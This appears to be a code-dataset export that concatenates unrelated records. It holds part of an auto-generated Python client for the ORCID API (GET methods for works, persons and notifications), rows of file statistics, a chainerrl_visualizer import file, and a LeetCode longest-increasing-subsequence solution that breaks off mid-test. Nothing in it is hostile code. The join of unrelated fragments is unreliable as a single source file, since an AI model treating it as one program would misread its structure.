resource_path = '/v3.0_dev1/{orcid}/peer-reviews'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PeerReviews',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_permission_notification(self, orcid, id, **kwargs):
"""
Fetch a notification by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_permission_notification(orcid, id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param int id: (required)
:return: Notification
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_permission_notification_with_http_info(orcid, id, **kwargs)
else:
(data) = self.view_permission_notification_with_http_info(orcid, id, **kwargs)
return data
def view_permission_notification_with_http_info(self, orcid, id, **kwargs):
"""
Fetch a notification by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_permission_notification_with_http_info(orcid, id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param int id: (required)
:return: Notification
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_permission_notification" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_permission_notification`")
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `view_permission_notification`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/notification-permission/{id}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_two_legs']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Notification',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_person(self, orcid, **kwargs):
"""
Fetch person details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_person(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_person_with_http_info(orcid, **kwargs)
else:
(data) = self.view_person_with_http_info(orcid, **kwargs)
return data
def view_person_with_http_info(self, orcid, **kwargs):
"""
Fetch person details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_person_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_person" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_person`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/person'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_personal_details(self, orcid, **kwargs):
"""
Fetch personal details for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_personal_details(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_personal_details_with_http_info(orcid, **kwargs)
else:
(data) = self.view_personal_details_with_http_info(orcid, **kwargs)
return data
def view_personal_details_with_http_info(self, orcid, **kwargs):
"""
Fetch personal details for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_personal_details_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_personal_details" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_personal_details`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/personal-details'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_record(self, orcid, **kwargs):
"""
Fetch record details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_record(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_record_with_http_info(orcid, **kwargs)
else:
(data) = self.view_record_with_http_info(orcid, **kwargs)
return data
def view_record_with_http_info(self, orcid, **kwargs):
"""
Fetch record details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_record_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_record" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_record`")
if 'orcid' in params and not re.search('[^/]+', params['orcid']):
raise ValueError("Invalid value for parameter `orcid` when calling `view_record`, must conform to the pattern `/[^/]+/`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}{ignore}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_researcher_url(self, orcid, put_code, **kwargs):
"""
Fetch one researcher url for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_researcher_url(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_researcher_url_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_researcher_url_with_http_info(orcid, put_code, **kwargs)
return data
def view_researcher_url_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch one researcher url for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_researcher_url_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_researcher_url" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_researcher_url`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_researcher_url`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/researcher-urls/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_researcher_urls(self, orcid, **kwargs):
"""
Fetch all researcher urls for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_researcher_urls(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_researcher_urls_with_http_info(orcid, **kwargs)
else:
(data) = self.view_researcher_urls_with_http_info(orcid, **kwargs)
return data
def view_researcher_urls_with_http_info(self, orcid, **kwargs):
"""
Fetch all researcher urls for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_researcher_urls_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_researcher_urls" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_researcher_urls`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/researcher-urls'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_specified_works(self, orcid, put_codes, **kwargs):
"""
Fetch specified works
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_specified_works(orcid, put_codes, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_codes: (required)
:return: WorkBulk
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_specified_works_with_http_info(orcid, put_codes, **kwargs)
else:
(data) = self.view_specified_works_with_http_info(orcid, put_codes, **kwargs)
return data
def view_specified_works_with_http_info(self, orcid, put_codes, **kwargs):
"""
Fetch specified works
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_specified_works_with_http_info(orcid, put_codes, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_codes: (required)
:return: WorkBulk
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_codes']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_specified_works" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_specified_works`")
# verify the required parameter 'put_codes' is set
if ('put_codes' not in params) or (params['put_codes'] is None):
raise ValueError("Missing the required parameter `put_codes` when calling `view_specified_works`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/works/{putCodes}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_codes' in params:
path_params['putCodes'] = params['put_codes']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkBulk',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_work(self, orcid, put_code, **kwargs):
"""
Fetch a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_work(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Work
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_work_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_work_with_http_info(orcid, put_code, **kwargs)
return data
def view_work_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_work_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Work
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_work" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_work`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_work`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/work/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Work',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_work_summary(self, orcid, put_code, **kwargs):
"""
Fetch a Work Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_work_summary(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: WorkSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_work_summary_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_work_summary_with_http_info(orcid, put_code, **kwargs)
return data
def view_work_summary_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch a Work Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_work_summary_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: WorkSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_work_summary" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_work_summary`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_work_summary`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/work/summary/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkSummary',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_works(self, orcid, **kwargs):
"""
Fetch all works
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_works(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Works
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_works_with_http_info(orcid, **kwargs)
else:
(data) = self.view_works_with_http_info(orcid, **kwargs)
return data
def view_works_with_http_info(self, orcid, **kwargs):
"""
Fetch all works
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_works_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Works
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_works" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_works`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/works'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Works',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.563486
| 213
| 0.559865
| 34,624
| 339,912
| 5.264528
| 0.007047
| 0.064078
| 0.022427
| 0.028835
| 0.990794
| 0.987656
| 0.984749
| 0.98081
| 0.975499
| 0.961734
| 0
| 0.002401
| 0.351932
| 339,912
| 7,985
| 214
| 42.568817
| 0.825064
| 0.281111
| 0
| 0.841098
| 1
| 0
| 0.207533
| 0.07522
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037018
| false
| 0
| 0.001763
| 0
| 0.094183
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c1d6ceae4275e728a52eec7dda1d25264d3c4e91
| 171
|
py
|
Python
|
chainerrl_visualizer/worker_jobs/__init__.py
|
Ravie403/chainerrl-visualizer
|
302bcd574d435ab68652b084764d4bb777300494
|
[
"MIT"
] | 45
|
2018-12-13T07:18:43.000Z
|
2022-03-26T15:37:27.000Z
|
chainerrl_visualizer/worker_jobs/__init__.py
|
Ravie403/chainerrl-visualizer
|
302bcd574d435ab68652b084764d4bb777300494
|
[
"MIT"
] | 12
|
2018-12-13T10:46:23.000Z
|
2021-03-08T23:39:56.000Z
|
chainerrl_visualizer/worker_jobs/__init__.py
|
Ravie403/chainerrl-visualizer
|
302bcd574d435ab68652b084764d4bb777300494
|
[
"MIT"
] | 10
|
2018-12-13T07:20:20.000Z
|
2021-12-11T14:07:56.000Z
|
from chainerrl_visualizer.worker_jobs.rollout_job import rollout # NOQA
from chainerrl_visualizer.worker_jobs.saliency_job import create_and_save_saliency_images # NOQA
| 57
| 97
| 0.883041
| 24
| 171
| 5.875
| 0.583333
| 0.184397
| 0.326241
| 0.411348
| 0.468085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081871
| 171
| 2
| 98
| 85.5
| 0.898089
| 0.052632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c1f85a7cc21905d82bb4406dce1623a420bb5072
| 8,802
|
py
|
Python
|
medium/Q300_LongestIncreasingSubsequence.py
|
Kaciras/leetcode
|
d203aecd1afe1af13a0384a9c657c8424aab322d
|
[
"MIT"
] | null | null | null |
medium/Q300_LongestIncreasingSubsequence.py
|
Kaciras/leetcode
|
d203aecd1afe1af13a0384a9c657c8424aab322d
|
[
"MIT"
] | null | null | null |
medium/Q300_LongestIncreasingSubsequence.py
|
Kaciras/leetcode
|
d203aecd1afe1af13a0384a9c657c8424aab322d
|
[
"MIT"
] | null | null | null |
class Solution:
def lengthOfLIS(self, nums):
"""此题关键不能陷入惯性思维,认为必须找到这个子序列,其实只需要长度相等即可"""
if len(nums) < 2:
return len(nums)
sub = [nums[0]]
def find_greater(x, lo, hi):
if lo == hi:
return lo
mid = (lo + hi) >> 1
if x > sub[mid]:
return find_greater(x, mid + 1, hi)
else:
return find_greater(x, lo, mid)
for n in nums:
if n > sub[-1]:
sub.append(n)
else:
sub[find_greater(n, 0, len(sub))] = n
return len(sub)
def lengthOfLIS_0(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if not nums:
return 0
length = [1] * len(nums)
for i, n in enumerate(nums):
k = length[i]
for j in range(i - 1, k - 2, -1):
if nums[j] < n:
length[i] = max(length[i], length[j] + 1)
return max(length)
if __name__ == '__main__':
print(Solution().lengthOfLIS([]))
print(Solution().lengthOfLIS([1, 2, 3, 4, 5, 6, 7, 8]))
print(Solution().lengthOfLIS([10, 9, 2, 5, 3, 7, 101, 18]))
print(Solution().lengthOfLIS([7, 6, 5, 4, 3, 2, 1]))
print(Solution().lengthOfLIS(
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
